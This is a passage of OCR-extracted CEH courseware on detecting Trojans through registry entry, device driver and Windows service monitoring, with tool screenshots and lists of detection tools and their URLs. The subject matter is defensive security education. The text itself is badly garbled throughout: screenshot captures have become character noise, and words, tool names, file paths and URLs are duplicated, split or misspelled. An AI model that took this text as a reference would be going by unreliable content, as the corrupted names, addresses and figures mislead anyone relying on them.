□ HKCR\ D:\CEH-Tools\Cwireshark-win32-1.4.2.exe
01.10.2012, 05:02
25%
MRU and other hist(D:\CEH-T D:\CEH-T00ls\CEHv8 Module 10 Denial of Servi ce \Wireshark\w1reshark-vwn32-l. other hist( C:\Users\Admm1stratorpownloads\vs_premium.exe
□ HKCf^ C:\Users\AdmirMicrosoft Visual Studio Premium 0 1.10.2012, 05:02
25 %
MRU and
□ HKCR \C:\Users\Admir Microsoft Corporation
01.10.2012, 05:02
25%
MRU and
other hist(C: VJsers \Adm \Admm1stratordownloads\vs jxemium.exe
□ HKOA E:\A E:\Appl ppl1cations Intel.multi^evlce_A09_R30799 01.10.2012, 05:02 05:02
25 %
MRU and
other hist( E: \Appl1cabons^)ell j4028r lpisplay\Intel_multi-device_A09_R307992.exe
□ HKCU^C:\Users\AdmirFirefox
6%
MRU and
<
01.10.2012, 05:02 III
1
other hist( GVUsersVAdmmistratorVDesktop^irefox setup 15.0. l.ex e
Custom fix...
>
|f
Fix
Delete
Oose
J
Selected: 0, highlighted: 1 total: 1492
FIGURE 6.53: 6.53: j v l 6 PowerTo ols 2012 -Registry Cleaner
Module 06 Page 958
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
-X R egistry egistr y Entry Entry M onitoring onit oring To Tool ol:: PC Tools Tools Registry Registr y ^ M e c h a n ic Source: http://www.pctools.com PC Tools Registry Mechanic is an advanced registry cleaner that scans the registry values for suspicious entries created by Trojan infections. It fixes the Windows error and improves your system speed and maximizes software performance. It cleans up your system and secures your personal privacy. It keeps all your Internet and PC activities private and erases sensitive information permanently.
Module 06 Page 959
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
PC Tools | Registr y Mechanic
PC Tools | Regi str y Mechanic
FIGURE 6.54: 6.54: PC Tools Registry Registry Me chanic Tool Screenshot
Module 06 Page 960
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
R eg istry E ntry M onitoring To Tool olss 5
Reg Organizer Organizer
http://www.ch chemtable le.com
1
Irnm
Registry Shower
1____j ____j
http://www.devicelock.com
Comodo Cloud Scanner S canner
SpyM e Tools Tools
http://www.lcibrossolutions.com
htp://www.comodo.com
Buster Sandbox Analyzer
http://bsa.isoftware.nl
Regshot
http://regshot.sourceforge.net
&
All-Seeing Eyes
La\
http://www.fortego.com
MJ Registry Registry Watcher Wat cher
http tp://www.jacobsm.com
Active Registry M onitor
http://www.registryshower.com
I
CIE H
Registry Live Live Watch
http://leelusoft.blo logspot.in
& Copyright © by
EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
R egistry egistr y Entry M onitoring onit oring Tools Tools In addition to jv l6 PowerT Pow erToo ools ls 2012 2012 - Registry Cleaner and PC Tools Registry Mechanic, there are many other tools that allow you to monitor registry entries and thus help detect Trojans installed, if any. A few of the registry entry monitoring tools that are mainly used for the purpose of cleaning the registry are listed as follows: 0
Reg Organizer available avail able at http://www.chemtable.com
0
Registry Registry Shower Showe r available at http://www.registryshower.com
0
Comodo Cloud Cloud Scanner Scann er available availab le at http://www.comodo.com
0
Buster Sandbox Analyzer available availab le at http://bsa.isoftware.nl
0
All-Seeing All-Seeing Eyes available availa ble at http://www.fortego.com
0
MJ Registr Registry y Watch Wa tcher er available at http://www.jacobsm.com
0
Active Registry Registry Monitor Moni tor available at http://www.devicelock.com
0
SpyMe Spy Me Tools Tools available at http://www.lcibrossolutions.com
0
Regshot available availa ble at http://regshot.sourceforge.net
0
Registry Registry Live Watch Wa tch available at http://leelusoft.blogspot.in
Module 06 Page 961
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Scanning fo forr Suspicious Suspicious Dev ice Drivers
CEH
Trojan Device Driver
Scann ing for f or Suspicious Dev ice Drivers When device drivers are downloaded from various sources that are not trustworthy Trojans may also get installed on the system. Trojans use these devices as covers to hide but by using device driver monitoring tools, we can identify if there is any Trojan present. Trojans are installed along with device drivers downloaded from untrusted sources and use these drivers as a shield to avoid detection. Scan for suspicious device drivers and verify if they are genuine and downloaded from the publisher's original site.
Module 06 Page 962
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojan Device Driver
cdrom.sys
Systeminformation M. M* *• . H■* Sy1t*nSt m vr 2 P«e>jrc*< ■[OTpcnwa - ScftHft Emvcmot Emvcmot Emorm tnl ViTMbkt
*P* i:p*x *rpoagr
Nrt*Cft C&vyflore
S4rac« Program V->up* *o?•m, OU R*9«tfJbCf• Wntort Iror *♦pertryj
*IptfKl
.jpUO •ncfca •1
Ovrrptor 3 W O KI CompInn*Hc« Jwif* W»Cf040«ACHCfMf MKTCfOdACUfcl OriVCf ACft Procvtt cr Aggr Aggr«o «o*or.. ACMfowt r Meter Dretr ACMWj kt AlwmCfr.t f adit «d^a *dptfca •dpotTO Xn ll«1j fuir to Clr.tr (0«._ H « ACf Br Brt f«cr 1M) Ki PtMM W Dnnr AN©►r®l«»»o»Dirr*' Dirr *' *f lxSuU *nvlibt
cyandowsMwsMc\*«nd0 c\*«nd0 * \*.c\w«t40wf\c.. CAwnaows'i.. c\v«ndowfi.c \ma40w*\sCVwtfowiUcWwviows's c\wan40wf\s~ e\w1ndow»\»~ rvw*«40v<\< CVnntowfS*.. c\v»ndcm\srVwmdowtH rVwmdowtH c\*nntfow»\» e\*m4av%\*
mo □ u » rf
<«Ug«ryOn*,
O
Tyr* M nH D rw rw i KcmHOnrfr K«mt<0*r.*r t<0*r .*r KcmH Dm t Ktmri Drwtr
Kemtl Dover K*»nrt Dnrff Kamri 0 « K«mrl O w KtmH Dnrft r#mMPm*( KimHOn■*• KtmH O rw rw K«m«l D*w* Ktrnr Ktrnri Otne n et K«mri Orw K«Ml Brt*
* NO NO VK m No No NO m No NO NO V»» NO No No NO No
v
UOM’ Wd
Go to Run > Type m s in f032
^ Software Environment > System Drivers Drivers
Attacker
FIGURE 6.55: Scanning for Suspicious Device Drivers
Module 06 Page 963
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Device Drivers M onitoring onitoring Tool: DriverView J
CEH
DriverV iew utility displays the list of all all devic e dri vers currently loaded on system. For each driver in the list, list, additional information is displayed such as load address of the driver, description, version, product name, company that created the driver, etc.
DnverView
L
File Edit View Options Help fa eg •3J 8
d cdd.dti 9 TSDDDdll # winJ2k.sys 9 pa1sthtupe11e1.1ys ® vhdparsei.sys ® atyncmac syt » W PR0.4 IJ001 .jyj * wv.iyi yi ♦ srv2.syt ♦ vhdmp.tyl • Fj0epend1.sy* « > * 9•*(* ♦ wvneUys
■> d ' pdi.tyi » np npf.eyt O NIProbeMenvSYS O WnVDfdrvG.tys * HTTP.syt <>lunparsei.sy sys 3 eondrvsys # storpott.jys ys # WmVDEdrv.sys mrjsmbiOiVj
Address 0005X00X St-9000 000:0000X-ff 00X-ffOX OX 0000x 000P09000 000X 0X00000162000 0000x 0016»»00 0016»»00 0000x 00 t?t9 t?t90 000 0005X00 69DO 69 DOOOO 000x100016901000 0000x0016933000 0000X001& 01&9W000 000X000 16812000 000:000016900000 oooooootsfqooo
0000X001if9K)00 B»»W B»»W)' )'JI J IMOOO M OOO 000X000 1MUOOO 000X0001M 01MS7000 0000X00'5r4800C 0000X00'5r4800C 0000x0015H9000 0000X001£38000 000X000OICOOX 000x 000 isrooooo 0000X0015WEM0 000x0001 0 £0 0 0000x 001>D2yox
See tkOXttWOC CkOXJbOOC 010X09000 ChQXXtoOP1} (MnaOaOOG (kOCOOcOOO CttX tXOOcOOC
Load2 1 1 5 1 1 1 1 1 UOOOMOOO 1 o>axaoooc 1 0100012000 2 * 00012000 j (WXOCfcOOO 1 O0OOJ1OOO 1 ftOWPcttH 1 04000000 1 * 0000000 04X0*1000 1 OkOXCMOO 1 1vy x
Inc* 12s 124 123 2 1Si •*? 14S 147 146 145 151 150 142 141 140 l» 117 136 IB 114 154 143 " 144 ■
file Type Dnvt Dnvtf Disp s play[>wf 0!5ptoy Driver System D1r»«r System 0r1 0r1*e SystemOliver Net*orlrOliv iver Unknown f*et*cA01 »« NetworfcD1 ve» Syltern Dimt Viter t er Differ Applic ication NatAOfliOiivef V,• *>*r $y*em DrNtr Unknown Syitcm Syit cm 011v® System Ol Oliver V/flnr nr• Oliv iver Sytttm Diver Unknown S.-U0T!Oliver
Desciip&on W1ndc«5NTOpe 5NTOpenType/Type1... CanonicalDisplay Driver Framebuffe f er Deploy Driver Multi-UserWin32Orrvw Pass thru parser Native VUG palter MSRemoteAccess serialnetwor... ..
Version S.1. 1& . 234 6 .2.84000 6.2.840010 62.84000 62.840010 6? 84000 6? 04000
Strvtf dnvtt 5mt»2.0Se 0Serverdrivn WD Miniport Dover FikSytfemDependencyManag... TCP/IP Registry stryCompatibility0... S«rv«t Netwoik On. MHnmnn tICURITV D>k w M.c osc« R Df Device !•director npf.ey .ey*(NTV6AM064)Kernel D... NiProbeMemfoeObserver Devie... e...
62.840010 02.64000 6.2.84000 62.8400.0 6.2. 2.84 840010 .. MOO. 4J.M.0 62.84000 41.0.2001 16.0 .0.8 .8.0 .0
HTTPProtocol Stic Stick lunparser ConsoleDriver Mkmoft Storage PortDrive ver ViiUmI Encryption Drive lonahoinSM8 2.0Redire rector
62.840010 62.84000 6.?.8400 0 6.2, 28 , 40010 7.0.0.0 62.8400.0
Company AdobeSystem™ Micr crosoft Corp.. oxoooxt. a MicrosoftCorp-. OXOOOXXMicrosoftCorp... OXOOOXCMicrosoft Corp... 0X000X1Micr crosoft Corp... .. 0X000X1.. MicrosoftCorp... 000000x 10X000X1MiCfOJOftCorp.. 0x000051Microsoft Corp... oxoooo:1MicrosoftCorp.. oxooox 1 Microioft Microio ft Corp... .. 0X00000-1 -1MkrosoftCorp... 0X00000-1Miti tiov ovoHCor Corp.. 0X000031M i iw w n C 0x00005 1.. Microsoft Corp.. 0X0000: 1CACI lochnoL. oxooox 1_ NetworkInsttu. 0X0000:110X000051Microi c roiol o lt Co Corp... 0X000031Microsoft Corp.. oxoooo: 1Microsoft Corp.. 0X00003 1.. Microsoft Coep... .. 00000003'1NewSoftwares.... 0X000031Microsoft Coro... 0X0000:
155 item(i), 1Selected 1 Selected
http://www.nirsoft.net Copyright © by EG-G*ancil. All Rights Reserved. Reproduc tion Is Strictly Prohibited.
D evice D rivers M onitoring Tool Tool:: DriverV DriverV iew Source: http://www.nirsoft.net The DriverView utility displays the entire currently loaded device drivers list in your system. Additional information is displayed for each and every driver in the list such as load address of the driver, description, version, product name, company that created the driver, etc. Instead of browsing for system components separately in Control Panel, just by running this application on your system you can easily know all the drivers on your system. This application displays the list of drivers that are on your system quickly and easily. It can create HTML reports.
Module 06 Page 964
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Trojans and Backdoors
Exam 312-5 312-50 0 Certified Ethical Hacker
35
DriverView
Fite
a
Edit 0
View
^
!
Options
Help
$
Driver Name * ATMF ATMFD. D.DLL DLL
Address 000C000000B69000
Index 125 124
File Type Driv Driver
* c dd dd.dll
OOOOOOOOOO8FFOOO
0x00036000
1
* TSD TSDDD.dll
00000000 00709000 OOOCOOOO'OOl62000
0x00009000 0x003ed000
Disp Displa lay Criver iver
Cano Canoni nica call Displa splay Driver
1 5
123
Fram Frameb ebufferDisp s playDriver
121
Disp s playCrive v er System Criver
OOOCOOOO'l69F3000 00
Mult Multii-User User Win32 Drive ver
6.2.8400.0
Micr Micros osof oftt Corp Corp... OOOOOOOO'O.,
OxOOOObOOO
1
153
System Criver
Pass thru pa parser
6.2.8400.0
^ vhdparser.sy vh dparser.sys
Microsoft Co Corp... 000000001..
00000000169E9000
OxOOOOaOOO
1
149
System Criver
N ative VHD parser
6.2.8400.0
^ asyncmac.sys
Microsoft Corp... 000000001..
OOOCOOOO'169DD000
OxOOOOcOOO
1
Network Driver
MS Remote Access Access serial ial networ. networ... .. 6.2.8400.0
Microsoft Corp... 000000001..
* WPRO_41_2001.sys OOOCOOOO'l69D1000 ♦ s rv rv.sys OOOCOOOO'l6933000
OxOOOOcOOO 0x0009eOOO
1 1
Unknown Network Driver
Server driver
6.2.8400.0
000000001.. Microsoft Corp... 000000001.. M icrosoft Corp... 000000001..
♦ win32k.sys passthruparser.sys
Size 0x00060000
Load... 2
Description Wind Window ows s NT Open OpenType/ pe/Type 1...
Version 5.1.2.234 6.2.8400.0 6.2.8400.0
Company Adobe obe System stem.. ...
End A... OOOOOOOO'O..
Micr Micros osof oftt Corp Corp... 00000000 0.. = Micr Micros osof oft Corp... OOOOOOOO'O..
• s rv rv2.sys
OOOCOOOO'l6896000
0x0009d000
1
148 147 1-16 145
Network Driver
Smb 2.0 Server driver
6.2.8400.0
^ v hd hdmp.sys
OOOCOOOO'l6812000
0x00080000
1
151
System Criver
VHD M in iport Driver
6.2.8400.0
M icrosoft Corp... 000000001..
# FsDepends.sys
OOOCOOOO'16800000
0x00012000
2
150
Syst System Criv Criver
File File System stem Depe Dependency Mana Manag. g...
6.2.8400.0
Micr Micros osof oftt Corp Corp... 000000001..
^ tcpipreg preg.s .sys ys ® srvnet.sys
OOOCOOOO'15FE3000
0x00012000
1
142
Appl Applicat icatio ion
TCP/ TCP/IP IP Regi Registry stry Comp Compat atib ibil ilit ity D...
6.2.8400.0
Micr Micros osof oftt Corp Corp... 000000001..
OOOCOOOO'15F9F000
0x00044000
3
141
Net Network workDriver
Ser Server ver Net Network workdriver
6.2.8400.0
Micr Micros osof oftt Corp... 000000001..
£ secdrv.SYS S YS
OOOCOOOO'15F94000
OxOOOObOOO
1
140
System Cr Criver
Macr Macrov ovision o n SECURITY Dr Driver
4.3.86.0
Macr MacrovisionC...
♦ rdpdr.sys
OOOCOOOO'15F63000
0x00031000
1
139
Driver
Micr Microsof osoft RDP Device redirector
6.2.8400.0
Micr c rosof osoft Corp... 000000001..
^ npf.sys 1 NiPr NiProb obeM eMem em.S .SYS YS
OxOOOOcOOO OxOOOOfOOO
1 1
137 136
CACE Tech Techno nol. l... . . 000000001.. Netw Network ork Ins Instru... 000000001..
0x0002f000
1
* HTTP.sys
OOOCOOOO'l5E38 38000
OxOOOelOOO
1
135 134
System Criver Syst System Criver ver Unknown
npf.sy s ys (NT5/6 AMD64) Kernel D... 4.1.0.2001 NiPr NiProb obeM eMem em for for Observer rver Devi Devic. c... 16.0.8.0
^ WinVDEdrv6.sys
OOOCOOOO'15F57000 OOOCOOOO'15F48000 OOOCOOOO'l5F1 F19000
System Cri Crive v er
6.2.8400.0
Mic Microsoft Corp... 000000001..
000000001..
OOOOOOOO'I..
♦ lunparser.sys
OOOCOOOOl' 5EO EODOOO
OxOOOObOOO
1
154
System Criver
HTT HTTP Prot Protocol ocolStack lun parser
6.2.8400.0
Microsoft Corp... p... 000000001..
• condrv.sys
OOOCOOOO'l 5E00000
OxOOOOdOOO
1
143
System Criver
Console Driver
6.2.8400.0
Microsoft Corp... 000000001..
^ storport.sys
OOOCOOOO'l5D9E000
0x00054000
1
System Criver
OOOCOOOO'l5D5EOOO OOOCOOOO'l5D25000
0x00040000 0x00039000
1 1
Micros Microsoft oft Stora Storage Port Port Driv Driver er Virtual Enc Encryption Driver Lono Lonoho horn rn SMB 2.0Redire rector ctor
6.2.8400.0
♦ WinVDEdrv.sys ♦ mrxsmb20.svs
152 144 133
Micros Microsof oftt Corp. orp... 000000001.. NewSoftwares.... 000000001.. Micr Micros osof oftt Coro Coro.. ... (XXXXXXX) 1.. v
Unknown Svst Svstem Criver iver
7.0.0.0 6.2.8400.0
155 item(s), 1Selected
FIGURE 6.56: DriverView Screenshot
Module 06 Page 965
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Device De vice D rivers M on onitoring itoring To Tool olss i
jnj jnj
■
\
Driver Reviver
Driver Detective
http://www.dri\/ershq.com
V
^
Unknown Device Device Identifier
htp://www.zhangduo.com
(v
http://www.reviversoft.com
1
DriverScanner
_•
DriverGuide Toolkit Toolkit
y y
H
,
DriverMax
http://www.uniblue.com
Double Driver
http://www.driverguidetoolkit.com
http://www.innovative-sol.com
CEH
http://www.boozet.org
BBB
□□
Driver Magician
My Drivers
htp://www.zhangduo.com
DriverEasy
http://www.dri\/ermagician.com
http://www.drivereasy.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduc tion Is Strictly Prohibited.
D evice evic e D rivers ri vers M onitoring onit oring Tools Tools A few of the device driver monitoring tools that help in detecting Trojans are listed as follows: 0
Driver Detective available at http://www.drivershq.com
0
Unknown Device Identifier available at http://www.zhangduo.com
0
DriverGuide Toolkit available at http://www.driverguidetoolkit.com
0
DriverMax available at http://www.innovative-sol.com
0
Driver Magician available at http://www.drivermagician.com
0
Driver Reviver available at http://www.reviversoft.com
0
DriverScanner available at http://www.uniblue.com
0
Double Driver available availab le at http://www.boozet.org
0
My Drivers Drivers available at http://www.zhangduo.com
0
DriverEasy available at http://www.drivereasv.com
Module 06 Page 966
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Scan Scann ning for Suspicious W i n d o w s Ser Services
Trojans spawn Windows services allow attackers remote control to the victim machine and pass malicious instructions Trojans Trojans rename their the ir processes to look like a genuine Windows service in order to avoid detection Enterprise Enterprise Service ce Manager
1r p.. CAV/1 OJ fm 5a (?(WIO (?(WIOfTfO.. tlccsJ.. tlccsJ... Rum.. c m . . OJ *rev** FartC«*1« 5a e:\w1 A / Wn Wn jc i a Ft Ftearhlnn Fo
<• ! *J 0J £'
L^_
x
S wip T jp o
A
Automatic M Automatic Automatic Manu5l Manual Automatic Manual Automatic 61l1m.hr
I-M55ELCK.4K41
J
Trojans Trojans employ employ rootkit techniques to manipulate HKEY_LOCAL_MACHINE\System\CurrentControlSet \Services registry keys to hide its processes
V
1 ar6/a
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
S c a n n i n g f o r S u s p i c io i o u s W i n d o w s S e r v ic ic e s w
O n c e th th e T r o j a n s a r e i n s ta t a l l e d o n W i n d o w s s e r v i c es es , i t b e c o m e s e a s y f o r a n a t t a c k e r to operate the system from a remote location. Trojans also create their processes to look like g e n u i n e W i n d o w s s e r v ic ic e s in in o r d e r t o a v o i d d e t e c t i o n . W i t h t h e h e lp l p o f W i n d o w s s e rv rv ic ic e s monitoring tools, you can detect the Trojans. T r o ja j a n s t h a t s p a w n W i n d o w s s e r vi v i ce c e s a l lo lo w a t t a c k e r s r e m o t e c o n t r o l t o t h e t a r g e t m a c h i n e a n d pass malicious instructions. Trojans rename their processes to look like a genuine Windows service
in
order
to
avoid
detection.
Trojans
employ
rootkit
techniques
HKEY_LO EY_LOC CAL_MA L_MACHI NE\ Syst Syst em\ Cur r ent ent Cont ont r ol Set Set \ Ser Ser vi ces r egi egi st r y
to
manipulate
keys t o h i d e t h e i r
processes.
Module 06 Page 967
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Enterprise Service Manager F ile V ie wA c tio n H e lp S e rv ic eT y p e • R e g u la r
riv e rs C A ll C D
D is p la yN a m e
R e fre s h
D e s c rip tio n
Select Sel ect a workstation
C o m p u te r S ta tu s
E x te n s ib le A u th e n tic a tio n ... @ % s y s te m r o ... < L o c a l. .. S to p ...
P a th
S ta rtu pT y p e
C A W i...
M a n u a l
U #E n c ry p tin gF ile S y s te m ( E ... @ % S y s te m R ... < L o c a l... R u n n ... C A W i... A u to m a tic < L o c a l...
1iys1d!1st29 ft? W in d o w sE v e n tL o g C 0 M + E v e n tS y s te m
R u n n ... C A P r ...
A u to m a tic A u to m a tic
F u n c tio nD is c o v e r yP r o v i... @ % s y s te m r o ... < L o c a l. .. S to p ...
C A W i...
M a n u a l
C A W i...
M a n u a l
@ % s y s te m ro ... < L o c a l... R u n n ... C A W i...
d# W in d o w sP re s e n ta tio nF o ... @ % S y s te m R ... < L o c a l... S to p ... M ic r o s o ftF T P S e r v ic e
@ % w in d ir % V ..
Rrni in Pnlirit Plipnr
1 S 9S e rv ic e s
I ----1
p
@ % S y s te m R ... < L o c a l. .. R u n n ... C A W i... A u to m a tic @ c o m r e s .d ll,... < L o c a l. .. R u n n ... C A W i...
ft? F u n c tio nD is c o v e ryR e s o ... @ % s y s te m r o ... < L o c a l. .. S to p ...
Qkf W in d o w sF o n tC a c h eS e r ...
A
1C o m p u te r(s )
C A W i...
< L o c a l. .. R u n n ... C A W i...
1n r ^ l A d m in is tra to r
1
R in n
r \w !
A u to m a tic M a n u a l A u to m a tic
1
A tfnmslir
W IN -M S S E L C K 4 K 4 1
V
1 0 /6 /2 ^
FIGURE 6.57: 6.57: Scanning Scanning for Suspicious Window s Services
Module 06 Page 968
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
W i n d o w s S e r v i c e s M o n i t o r i n g T oo o o l: l: W in d ow s S e rv ic e M a n a g e r^ S r v M k n ) W i n d o w s S e r v ic ic e M a n a g e r s i m p l i f ie ie s a l l c o m m o n t a s ks ks r e la la t e d t o W i n d o w s s e r v i c e s . I t c a n c re re a t e s e r v ic ic e s ( b o t h W i n 3 2 a n d L e g a c y D r iv iv e r ) w i t h o u t r e s t a r t i n g W i n d o w s , d e l e t e e x i s t in in g s e r v i c e s , a n d c h a n g e s e r v i c e c o n f i g u r a t i o n
© File
Service Manage: View
Service
Help
I rtrt cm cmo lna rrrrc St ol e P^DM SysA... step e pped runring K w tunning . v> v> C5 C5 N5 N5P D . st epped >*>C *>CSM5PD.. runr runrin ing g C5Ndi5LVF stepped $ DcomL DcomLau au.. .. runr runrin ing g defragsv c stepped 3 De i/ fc fc eA eAi st epped | Dc/colr Dc/colro... o... stepped l unrino &Dfs runring 0 Df tc O Df sDi iv oi r un un riri ng ng DFSR runring fT)Df«r10 r un un ririn g mnrino # Dhcp Dhcp runring dijoocho tunring ^ disk stepped dmv*c Druoack© runring stepped 9 doOsvc doOsvc runring & OPS
Type
Win32 dnvei ?hared dr ive! drive! dnvet ?hared wr!32 th ha a re re d *hared wn32 FSdav« FS d riri ver wr>32 FS d ririver th ha a re re d drvot drvoi dr v* t t harod i lili ae ae d , h« h« .d .d
Ci;plcy r a r e CON-► S^ t enApof cabun Confole Dn Dn / « Cryptogiophic Servces C SN5 HZ HZ TS TS8 2N DI S Ptyoca D«ver ver CSNE CSNEFD FDTS TSCa Cac^ c^ VOS VOS Vetoed Vetoed Dt v <* C$ Nd sL sLV » »ff HD HD1S P wt wt cc cc o D t ^ f DCOM Serv Server er ^ccett Lau Laurc rchy hy Optimzc m zc di/e j D ev ev ic eA ss ss ac ac ia kr kr ! S er er ve ve • D c v c c h i t a l Servce DFS Noi 1e:w-e DFS Nanet p-K * Chent L rv* D rS rS N am ame«pa~o $ o \«1 \«1 Fllei 0 DFS Rap lk alan DrS Flcplcabcr RcocC rf> Dtvct DHCP Cl Cl er er i S y t to n A t i r b jto Ca Cac to Disk Driver d rvsc DNS C iori W iedA u utt oC oC on on ffg g DiagrcRbc Poley Ser\»c#
Sta-t type n am d na nod 00(0 tyrterr tyrterr :yjtem i vs vs te te rrrr auto uto nonod nanu^l no nod 0U0 0U0 tyckrr : * MilO bcc» *.to t y j k xx beet aeto rwnod *. «
Executable C:\' VinC >C5N5FDT 5FDTS8Z syt syt J Sy3tem Sy3tem32\Driv Drivcr»'1C cr»'1CSNEFD SNEFDT SS2<64 2<64. ays Ss 1sem. 32\ Dr iver s\ C$NdsL' VF. sys C:\VV :\VV1n\dijk. jys 'Sys1arFeor\Sy8te1n32'1e»11/ers\dmvJCsy* C:\Windcvt e\#>ete1r132UvchMt e «0 kMelwor... CA'Windcw5\iy5len132\jV'ch0it exe •k LocolS .. C\\W1n
h ttp://tools.sysprogs. org Copyright Copyright © by EG-Gouncil. All Rights Jteseivfed'.;Reproduction is Strictly Prohibited.
W i n d o w s S e r v i c e s M o n i t o r i n g T oo o o l: l: W i n d o w s S e r v i c e M a n a g e r (S ( S rv rv M a n ) Source: h t t p : / / t o o l s . s y s p r o g s . o r g Windows Service Manager is a tool that allows you to shorten all public tasks linked to Windows services. This can generate different services for Win32 and Legacy drivers without shutting down and restarting Windows. It can also cancel existing services and manipulate other configuration services. It has both GUI and ccommand-line modes. It can also be used to r u n a r b i t r a r y W i n 3 2 a p p l i c a t i o n s as as se se r vvii c es es . I t s u p p o r t s a llll m o d e r n 3 2 - b i t a n d 6 4 - b i t v e r s i o n s o f Windows.
Module 06 Page 969
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
File
View
Service
Internal name ,^)COMSysA... condrv $ CryptS CryptSvc V C S N 5 P 0 ... ,>CSN5PD. ,>CSN5PD.... - >C >C sN sN di di sL sL WF WF $ DcomLau. .... defragsvc Devi DeviceAs c eAs.. .... Devicelns... ^>Dfs O ^ f s D riri v er er •\fcDFSR ^ )D )D I sr sr R o $ Dh D hcp d iscache ^ di i^disk dmvsc Dnscache 3 dot3svc dot3svc £ DPS DPS
Exam 312-50 Certified Ethical Hacker
Help State stopped running lunning st o op pped lun lunning ing st o op pped runni ng ng stopped stop topped stopped running lunning lunni ng ng lunning lunning lunning tunning tunning stopped running stopped lunning
Type Win32 driver shared di iv ei ei drive iver dri ve ver shai ed ed Win32 shai shaied shaied Win32 FS diivei FS di di iv ei ei Win32 FS diivei shaied driver driver driver shared shared shared
Display name C 0M 0M + System Ap pl pl icat ion Console Dr Driver Cryptographic Services CSN5PDTS82 N DI DIS P ro rot o occol D riri ve ver CSN5 CSN5PD PDT TS82x S82x64 64 NDIS NDIS Pro Protoco tocoll Dri Driver CsNdi sL sLWF NDIS Pr ot ot o occol Dri ve ver DCOM Server Process L au auncher Optimize dr drives Device Association Service Device Install Service DFS Namespace DFS Namespace Client Driver DFS Na Na me mespace Se Serv er er Fi Filter Dri ve ver DFS Re Replication DFS Replicat ion Readonly Driver DHCP Client System Attribute Ca Cache Disk Driver dmvsc DNS Cl Client Wired AutoConfig Diagnostic Policy Service
Properties...
]
|
Start service servi ce
Add service
]
|
Delete service
Start type manual manual auto system system tem system aut o manual manu manual al manual aut o system system auto boot auto auto system boot manual auto manual auto
Executable C: \ W Wii nd ndo ws ws \s \s ys ys te tem32\ d dll lhos t.t. exe / Pr Pro ce ce ss ss id id . System32\drivers\condtv. sy sys C:\Windows\system32\svchost.exe •kNetwor... Sy st st e em m32\ Driv er er s\ s\ CS CSN5PD TS82. sy sys Syste ystem m32\D 32\Dri rivers v ers\C \CSN SN5P 5PDT DTS8 S82x 2x6 64.sy 4.syss Sys te te m3 m32\ Dr Drivers\ Cs Cs Nd Ndi sL sLWF. sy sys C :\:\ W Wii nd nd ow ow s\ s\s ys ys te tem3 2\ 2\ sv sv ch ch os os t.t. e exx e • k D co co mL mL .... C:\Windows\system32\svchost.exe •k • k de defiag... C:\Win C:\Windo dows\s ws\syst ystem3 em32\s 2\svch vchost ost.ex .exe e •k •k Loc Local alS... S ... C:\Windows\system32\svchost.exe •k DcomL... C: \\W W in in do do ws ws \s \s ys ys te tem 32 32 \d \d fssvc. ex exe System32\D river$\dfsc. sys s ys yst e em m32\ d drri ve vers\ d dff s. s. sys C: \Windows\system32\D FSR s. exe \Syst em emRoot\system32\ d1 d1ivers\ df dfsrro.sys C:\W C:\Win indo dows\ ws\sy syst stem em32 32\s \svc vcho host st.e .exe xe •k Loca LocalS lS.. .... System32\d1ive1s\discache. sys \SystemR00t\System32\drivers\disk.sys \SystemR00t\System32\drivers\dmvsc sys C:\Windows\system32\svchost.exe •k •k Networ C:\Windows\system32\svchost.exe •k LocalS... C:\W1ndows\System32Vsvchost C:\W1ndows\System32Vsvchost exe •k Local.. |
__ __ __ __ __ __ _
]
A
V
Restart service [__________________Exit
FIGURE 6.58: Windows Service Manager (SrvMan) Tool Screenshot
Module 06 Page 970
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
W i n d o w s Services Monitoring Monitoring Tools o
SMART Utility
AnVir Task Manager
i
http://www . http://www . thewindowsclub.com
CEH
http://www.anvW. com
Netwrix Service Service Mo nitor
Process Hacker
h t t p : / / w w w . netwrix.com . netwrix.com
http://processhacker.s http://processhacker.sourceforge.net ourceforge.net
Free Windows Service
Vista Services Optimizer
Monitor Tool
http://www.smartpcutilities.com
